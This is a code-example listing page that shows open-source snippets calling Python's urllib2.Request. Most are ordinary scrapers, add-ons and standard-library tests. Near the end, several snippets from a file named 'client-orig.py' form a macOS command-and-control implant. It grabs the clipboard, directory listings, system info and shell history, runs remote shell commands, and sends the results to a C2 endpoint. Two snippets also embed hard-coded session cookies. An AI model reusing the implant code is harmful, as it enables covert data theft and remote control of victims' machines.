urllib2.Request

Here are the examples of the python api urllib2.Request taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

605 Examples 7

3 Source : GetExpiredDomains.py
with BSD 3-Clause "New" or "Revised" License
from 3gstudent

def GetResults(loop,key):
    for i in range(1,loop):
        print "[+]Page %d" %(i+1)
        url = "https://www.expireddomains.net/domain-name-search/?start=" + str(25*i) + "&q="+ key
        #print url
        req = urllib2.Request(url)
        #req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")   
        res_data = urllib2.urlopen(req)
        html = BeautifulSoup(res_data.read(), "html.parser")
 
        tds = html.findAll("td", {"class": "field_domain"})
        for td in tds:
            print td.findAll("a")[0]["title"]
   
def SearchExpireddomains(key):

3 Source : Mercury.py
with GNU General Public License v3.0
from 4n6strider

def admin():
	links = open(x+'\Resources\links.txt')
	website = raw_input(Fore.CYAN + 'Enter a site to scan just www: ')
	type_link = raw_input('Is the link https or http: ')
	count4 = 1
	while True:
		try:
			sub_link = links.readline(count4)
			website2 = type_link+'://'+website+'/'+ sub_link
			req = Request(website2)
	    		response = urlopen(req)
		except HTTPError as e:
			print(Fore.RED  + website2) 
			count4 += 1
		except URLError as e:
    			print(Fore.RED + website2) 
    			count4 += 1
    		except  KeyboardInterrupt:

3 Source : neteasy_playlist_download.py
with MIT License
from 61Duke

    def _raw_http_request(self, method, action, query=None, urlencoded=None, callback=None, timeout=None):
        if method == 'GET':
            request = urllib2.Request(action, self.header)
            response = urllib2.urlopen(request)
            connection = response.read()
        elif method == 'POST':
            data = urllib.urlencode(query)
            request = urllib2.Request(action, data, self.header)
            response = urllib2.urlopen(request)
            connection = response.read()
        return connection

    @staticmethod

3 Source : neteasy_playlist_download.py
with MIT License
from 61Duke

    def get_playlist_id(self, action):
        request = urllib2.Request(action, headers=self.header)
        response = urllib2.urlopen(request)
        html = response.read().decode('utf-8')
        response.close()
        soup = BeautifulSoup(html, 'lxml')
        list_url = soup.select('ul#m-pl-container li div a.msk')
        for k, v in enumerate(list_url):
            list_url[k] = v['href'][13:]
        return list_url

    def get_playlist_detail(self, id):

3 Source : speedtest.py
with GNU General Public License v3.0
from a4k-openproject

def build_request(url, data=None, headers={}):
    if url[0] == ':':
        schemed_url = '{0}{1}'.format(scheme, url)
    else:
        schemed_url = url
    headers['User-Agent'] = user_agent
    return Request(schemed_url, data=data, headers=headers)


def catch_request(request):

3 Source : yt.py
with GNU General Public License v3.0
from a4k-openproject

def FetchPage(url):
    req = urllib2.Request(url)
    req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')
    req.add_header('Referer',    'http://www.youtube.com/')

    return urllib2.urlopen(req).read().decode("utf-8")


def replaceHTMLCodes(txt):

3 Source : client.py
with GNU General Public License v3.0
from a4k-openproject

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
    try:
        try: headers.update(headers)
        except: headers = {}
        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)
        response = urllib2.urlopen(request, timeout=int(timeout))
        return _get_result(response, limit)
    except:
        return


def _add_request_header(_request, headers):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_raise(self):
        # raising URLError stops processing of request
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "raise")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        self.assertRaises(urllib2.URLError, o.open, req)
        self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])

##     def test_error(self):
##         # XXX this doesn't actually seem to be used in standard library,
##         #  but should really be tested anyway...

    def test_http_error(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_cookies(self):
        cj = MockCookieJar()
        h = urllib2.HTTPCookieProcessor(cj)
        o = h.parent = MockOpener()

        req = Request("http://example.com/")
        r = MockResponse(200, "OK", {}, "")
        newreq = h.http_request(req)
        self.assertTrue(cj.ach_req is req is newreq)
        self.assertEqual(req.get_origin_req_host(), "example.com")
        self.assertTrue(not req.is_unverifiable())
        newr = h.http_response(req, r)
        self.assertTrue(cj.ec_req is req)
        self.assertTrue(cj.ec_r is r is newr)

    def test_redirect(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy(self):
        o = OpenerDirector()
        ph = urllib2.ProxyHandler(dict(http="proxy.example.com:3128"))
        o.add_handler(ph)
        meth_spec = [
            [("http_open", "return response")]
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://acme.example.com/")
        self.assertEqual(req.get_host(), "acme.example.com")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")

        self.assertEqual([(handlers[0], "http_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_no_proxy(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy_no_proxy(self):
        os.environ['no_proxy'] = 'python.org'
        o = OpenerDirector()
        ph = urllib2.ProxyHandler(dict(http="proxy.example.com"))
        o.add_handler(ph)
        req = Request("http://www.perl.org/")
        self.assertEqual(req.get_host(), "www.perl.org")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com")
        req = Request("http://www.python.org")
        self.assertEqual(req.get_host(), "www.python.org")
        r = o.open(req)
        self.assertEqual(req.get_host(), "www.python.org")
        del os.environ['no_proxy']


    def test_proxy_https(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_proxy_https(self):
        o = OpenerDirector()
        ph = urllib2.ProxyHandler(dict(https='proxy.example.com:3128'))
        o.add_handler(ph)
        meth_spec = [
            [("https_open","return response")]
        ]
        handlers = add_ordered_mock_handlers(o, meth_spec)
        req = Request("https://www.example.com/")
        self.assertEqual(req.get_host(), "www.example.com")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")
        self.assertEqual([(handlers[0], "https_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_https_proxy_authorization(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def setUp(self):
        self.get = urllib2.Request("http://www.python.org/~jeremy/")
        self.post = urllib2.Request("http://www.python.org/~jeremy/",
                                    "data",
                                    headers={"X-Test": "test"})

    def test_method(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_selector(self):
        self.assertEqual("/~jeremy/", self.get.get_selector())
        req = urllib2.Request("http://www.python.org/")
        self.assertEqual("/", req.get_selector())

    def test_get_type(self):

3 Source : test_urllib2.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_url_fragment(self):
        req = Request("http://www.python.org/?qs=query#fragment=true")
        self.assertEqual("/?qs=query", req.get_selector())
        req = Request("http://www.python.org/#fun=true")
        self.assertEqual("/", req.get_selector())

        # Issue 11703: geturl() omits fragment in the original URL.
        url = 'http://docs.python.org/library/urllib2.html#OK'
        req = Request(url)
        self.assertEqual(req.get_full_url(), url)

    def test_private_attributes(self):

3 Source : test_urllib2net.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_urlwithfrag(self):
        urlwith_frag = "http://www.pythontest.net/index.html#frag"
        with test_support.transient_internet(urlwith_frag):
            req = urllib2.Request(urlwith_frag)
            res = urllib2.urlopen(req)
            self.assertEqual(res.geturl(),
                    "http://www.pythontest.net/index.html#frag")

    def test_fileno(self):

3 Source : test_urllib2net.py
with GNU General Public License v3.0
from adityaprakash-bobby

    def test_fileno(self):
        req = urllib2.Request("http://www.example.com")
        opener = urllib2.build_opener()
        res = opener.open(req)
        try:
            res.fileno()
        except AttributeError:
            self.fail("HTTPResponse object should return a valid fileno")
        finally:
            res.close()

    def test_custom_headers(self):

3 Source : test.py
with MIT License
from alexander-marquardt

    def extract_wsgi(self, environ, headers):
        """Extract the server's set-cookie headers as cookies into the
        cookie jar.
        """
        self.extract_cookies(
            _TestCookieResponse(headers), U2Request(get_current_url(environ))
        )


def _iter_data(data):

3 Source : badips.py
with MIT License
from artiomn

	def isAvailable(timeout=1):
		try:
			response = urlopen(Request("/".join([BadIPsAction._badips]),
					headers={'User-Agent': "Fail2Ban"}), timeout=timeout)
			return True, ''
		except Exception as e: # pragma: no cover
			return False, e


	def getCategories(self, incParents=False):

3 Source : diagnostics.py
with Apache License 2.0
from artyompal

def _call_metadata(suffix):
  """Return the response of the metadata service for the provided suffix."""
  request = Request(METADATA_URL + suffix, headers=METADATA_HEADERS)
  return urlopen(request).read().decode('utf-8')


def call_instance_metadata(suffix):

3 Source : akismet.py
with MIT License
from Arx-Game

    def _fetch_url(url, data, headers):
        req = urllib_request.Request(url, data, headers)
        h = urllib_request.urlopen(req)
        resp = h.read()
        return resp


class AkismetError(Exception):

3 Source : eone.py
with MIT License
from ascmove

def get_online_info():
    """
    旧版API接口,可能不稳定
    获取在线信息
    :return:在线信息
    """
    k = int(random.random() * 100000)
    test_data = {'action': 'get_online_info', 'k': k}
    test_data_urlencode = urllib.urlencode(test_data)
    requrl = auth_action_url
    req = urllib2.Request(url=requrl, data=test_data_urlencode)
    res_data = urllib2.urlopen(req)
    res = res_data.read()
    return res.split(',')


def auth_eone_logout():

3 Source : browser.py
with MIT License
from AstonZ

    def open(self, url, data=None, headers={}):
        """Opens the specified url."""
        url = urllib.basejoin(self.url, url)
        req = urllib2.Request(url, data, headers)
        return self.do_request(req)

    def show(self):

3 Source : client.py
with GNU General Public License v2.0
from Atrion

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
	try:
		try: headers.update(headers)
		except: headers = {}

		request = urllib2.Request(url, data=post)
		_add_request_header(request, headers)
		response = urllib2.urlopen(request, timeout=int(timeout))
		return _get_result(response, limit)
	except:
		return


def _add_request_header(_request, headers):

3 Source : navigator.py
with GNU General Public License v2.0
from Atrion

    def open_news_url(self, url):
            req = urllib2.Request(url)
            req.add_header('User-Agent', 'klopp')
            response = urllib2.urlopen(req)
            link=response.read()
            response.close()
            print link
            return link

    def news_local(self):

3 Source : client.py
with GNU General Public License v2.0
from Atrion

def _basic_request(url, headers=None, post=None, timeout='30', limit=None):
    try:
        try:
            headers.update(headers)
        except:
            headers = {}

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)
        response = urllib2.urlopen(request, timeout=int(timeout))
        return _get_result(response, limit)
    except:
        return


def _add_request_header(_request, headers):

3 Source : downloader.py
with GNU General Public License v2.0
from Atrion

def getResponse(url, headers, size):
    try:
        if size > 0:
            size = int(size)
            headers['Range'] = 'bytes=%d-' % size

        req = urllib2.Request(url, headers=headers)

        resp = urllib2.urlopen(req, timeout=30)
        return resp
    except:
        return None


def done(title, dest, downloaded):

3 Source : youtube_menu.py
with GNU General Public License v2.0
from Atrion

    def openMenuFile(self, menuFile):
        req = urllib2.Request(menuFile)
        req.add_header('User-Agent', self.agent)
        response = urllib2.urlopen(req)
        link=response.read()
        response.close()
        return link

    def processMenuFile(self, menuFile):

3 Source : navigator.py
with GNU General Public License v2.0
from Atrion

    def open_news_url(self, url):
            req = urllib2.Request(url)
            req.add_header('User-Agent', 'klopp')
            response = urllib2.urlopen(req)
            link=response.read()
            response.close()
            print link
            return link

    def showText(self, heading, text):

3 Source : pastebin.py
with GNU General Public License v2.0
from Atrion

    def upload_log(self, log, name=None):
        url = '/api/api_post.php'
        data = {'api_dev_key': API_KEY, 'api_option': 'paste', 'api_paste_code': log, 'api_paste_name': 'Kodi Log',
                'api_paste_private': 1, 'api_paste_expire_date': EXPIRATION}
        url = urlparse.urljoin(BASE_URL, url)
        req = Request(url, data=urllib.urlencode(data))
        try:
            res = urlopen(req)
            html = res.read()
            if html.startswith('http'):
                return html
            elif html.upper().startswith('BAD API REQUEST'):
                raise UploaderError(html[len('Bad API request, '):])
            else:
                raise UploaderError(html)
        except Exception as e:
            raise UploaderError(e)
            
    def send_email(self, email, results):

3 Source : tvaddons.py
with GNU General Public License v2.0
from Atrion

    def send_email(self, email, results):
        url = '/mail_logs.php'
        data = {'email': email, 'results': results}
        headers = {'Content-Type': 'application/json'}
        url = urlparse.urljoin(BASE_URL, url)
        req = Request(url, data=json.dumps(data), headers=headers)
        try:
            res = urlopen(req)
            html = res.read()
            js_data = json.loads(html)
            if 'result' in js_data:
                if js_data['result'] == 'success':
                    return True
                else:
                    raise UploaderError(js_data.get('msg', 'Unknown Error'))
        except Exception as e:
            raise UploaderError(e)
        
        return False

3 Source : api-call.py
with Apache License 2.0
from autopi-io

def execute(cmd, *args, **kwargs):
    url = "http://localhost:9000/dongle/{:}/execute/".format(get_minion_id())
    data = json.dumps({"command": cmd, "arg": args, "kwarg": kwargs})
    req = urllib2.Request(url, data, {"Content-Type": "application/json", "Content-Length": len(data) })
    with closing(urllib2.urlopen(req)) as res:
        return json.loads(res.read())

def state_output(res):

3 Source : index.py
with Apache License 2.0
from awslabs

def callJobTranscription(event):
    transcribe = boto3.client("transcribe")

    print("Call the job to download transcription")
    fileUUID = event.get("fileUUID")
    response = transcribe.get_transcription_job(TranscriptionJobName=fileUUID)
    transcriptFileUri = response.get("TranscriptionJob") \
        .get("Transcript").get("TranscriptFileUri")
    req = urllib2.Request(transcriptFileUri)
    opener = urllib2.build_opener()
    f = opener.open(req)
    data = json.loads(f.read())
    return data.get("results").get("items")


def makeVTTFile(items):

3 Source : virustotal.py
with MIT License
from b0bac

    def _file_rescan(self,_id):
        _string = ''
        if isinstance(_id,list):
            for sid in _id:
                _string += "%s,"%sid
        else:
            _string = '%s,'%str(_id)
        _string = _string[0:-1]
        _parameters = {"resource":_string,"apikey":self._key}
        try:
            data = urllib.urlencode(_parameters)
            _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan",data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception, reason:
            return None
        return _json

    def _fast_check(self,_file):

3 Source : virustotal.py
with MIT License
from b0bac

    def _get_report(self,_sha256):
        _url = "https://www.virustotal.com/vtapi/v2/file/report"
        _parameters = {"resource":_sha256,"apikey":self._key}
        try:
            _data = urllib.urlencode(_parameters)
            _requset = urllib2.Request(_url,_data)
            _response = urllib2.urlopen(_requset)
            _json = _response.read()
        except Exception, reason:
            return None
        return _json

    def check_file(self,_hash=None,_file=None):

3 Source : bazelisk.py
with MIT License
from bark-simulator

def read_remote_text_file(url):
  try:
    url = Request(url)
    url.add_header(
      'Authorization', 'token %s' % os.environ["BAZELISK_GITHUB_TOKEN"])
  except KeyError:
    pass
  with closing(urlopen(url)) as res:
    body = res.read()
    try:
      return body.decode(res.info().get_content_charset("iso-8859-1"))
    except AttributeError:
      # Python 2.x compatibility hack
      return body.decode(res.info().getparam("charset") or "iso-8859-1")


def get_version_history(bazelisk_directory):

3 Source : wdl_runner.py
with BSD 3-Clause "New" or "Revised" License
from broadinstitute

def gce_get_metadata(path):
  """Queries the GCE metadata server the specified value."""
  req = urllib2.Request(
      'http://metadata/computeMetadata/v1/%s' % path,
      None, {'Metadata-Flavor': 'Google'})

  return urllib2.urlopen(req).read()


class Runner(object):

3 Source : get-poetry.py
with MIT License
from BSlience

    def _get(self, url):
        request = Request(url, headers={"User-Agent": "Python Poetry"})

        with closing(urlopen(request)) as r:
            return r.read()


def main():

3 Source : default.py
with GNU General Public License v3.0
from bugatsinho

def open_url(url):
    req = urllib2.Request(url)
    req.add_header('User-Agent', ua)
    response = urllib2.urlopen(req)
    link=response.read()
    response.close()
    return link

def GET_url(url):

3 Source : posttest.py
with GNU General Public License v3.0
from bupticybee

def post(url, data):  
    req = urllib2.Request(url)  
    data = urllib.urlencode(data)  
    #enable cookie  
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())  
    opener.addheaders.append(('Cookie', 'nforum[UTMPUSERID]=notahacker2; nforum[UTMPKEY]=47086690; nforum[UTMPNUM]=4149; nforum[PASSWORD]=85pdI27XmRI9pdWLe%2Fk6CQ%3D%3D; Hm_lvt_a2cb7064fdf52fd51306dd6ef855264a=1472200699; Hm_lpvt_a2cb7064fdf52fd51306dd6ef855264a=1472974880'))
    response = opener.open(req, data)  
    return response.read()  

def reply(board,articleid,subject,reply):  

3 Source : receiver.py
with GNU General Public License v3.0
from bupticybee

def post(url, data):
	req = urllib2.Request(url)
	data = urllib.urlencode(data)
	#enable cookie
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
	opener.addheaders.append(('Cookie', 'nforum[UTMPUSERID]=notahacker2; nforum[UTMPKEY]=47086690; nforum[UTMPNUM]=4149; nforum[PASSWORD]=85pdI27XmRI9pdWLe%2Fk6CQ%3D%3D; Hm_lvt_a2cb7064fdf52fd51306dd6ef855264a=1472200699; Hm_lpvt_a2cb7064fdf52fd51306dd6ef855264a=1472974880'))
	response = opener.open(req, data)
	return response.read()

def api_reply(board,articleid,subject,reply):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def clipboard():
    try:
        pboard = NSPasteboard.generalPasteboard()
        pString = pboard.stringForType_(NSStringPboardType)
        pString2 = str(pString).encode('utf8')
        v = {'content':pString}
        s = 'https://127.0.0.1/validatiion/profile/6'
        r = urllib2.Request(s,headers=headers,data=v.get('content'))
        re = urllib2.urlopen(r,context=context)
        respn = re.read()
    except Exception as e:
        values = {'error':str(e)}
        srv = 'https://127.0.0.1/validatiion/profile/6'
        request = urllib2.Request(srv,headers=headers,data=values.get('error'))
        response = urllib2.urlopen(request,context=context)
        resp = response.read()
########################
def pwd():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def pwd():
    try:
        curdir = os.getcwd()
        d = {'content':curdir}
        k = 'https://127.0.0.1/validatiion/profile/3'
        b = urllib2.Request(k,headers=headers,data=d.get('content'))
        c = urllib2.urlopen(b,context=context)
        q = c.read()
    except Exception as e:
        d = {'error':str(e)}
        k = 'https://127.0.0.1/validatiion/profile/3'
        b = urllib2.Request(k,headers=headers,data=d.get('error'))
        c = urllib2.urlopen(b,context=context)
        q = c.read()
#########################
def listdir():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def listdir():
    try:
        dirs = glob("./*/")
        files = [x for x in os.listdir('.') if os.path.isfile(x)]
        total = dirs + files
        total2 = ','.join(total)
        a = {'content':total2}
        b = 'https://127.0.0.1/validatiion/profile/5'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/5'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
###########################
def cd(data):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def cd(data):
    try:
        data2 = data.replace('["cd ','')
        os.chdir(data2)
        a = {'content':'[+] Successfully changed dir to %s'%data2}
        b = 'https://127.0.0.1/validatiion/profile/4'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/4'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
############################
def systeminfo():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def systeminfo():
    try:
        s = NSAppleScript.alloc().initWithSource_("get system info")
        p = s.executeAndReturnError_(None)
        p2 = str(p).replace("  <  NSAppleEventDescriptor: ","").replace(">, None)", "")
        a = {'content':p2}
        b = 'https://127.0.0.1/validatiion/profile/14'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/14'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
############################
def listusers():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def addresses():
    try:
        s = NSHost.currentHost().addresses
        p = str(s)
        a = {'content':p}
        b = 'https://127.0.0.1/validatiion/profile/9'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/9'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
#############################
def prompt():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def userhist():
    try:
        s = open('/Users/%s/.zsh_history'%str(getpass.getuser()),'r').read()
        a = {'content':s}
        b = 'https://127.0.0.1/validatiion/profile/11'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/11'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
##############################
def checksecurity():

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def srun(data):
    try:
        data2 = str(data).replace('["shell ',"")
        sendstring = str(commands.getstatusoutput("%s" % data2))
        a = {'content':sendstring}
        b = 'https://127.0.0.1/validatiion/profile/16'
        c = urllib2.Request(b,headers=headers,data=a.get('content'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
    except Exception as e:
        a = {'error':str(e)}
        b = 'https://127.0.0.1/validatiion/profile/16'
        c = urllib2.Request(b,headers=headers,data=a.get('error'))
        d = urllib2.urlopen(c,context=context)
        e = d.read()
###############################
def sspawn(data):

3 Source : client-orig.py
with BSD 3-Clause "New" or "Revised" License
from cedowens

def ckin():
    try:
        url2 = 'https://127.0.0.1/validate/status'
        request = urllib2.Request(url2,headers=headers)
        response = urllib2.urlopen(request,context=context)
        data_read = response.read()
        datalist = str(data_read).split('+++++')
        return datalist
    except Exception as e:
        pass
################################
def runjxa(data):

See More Examples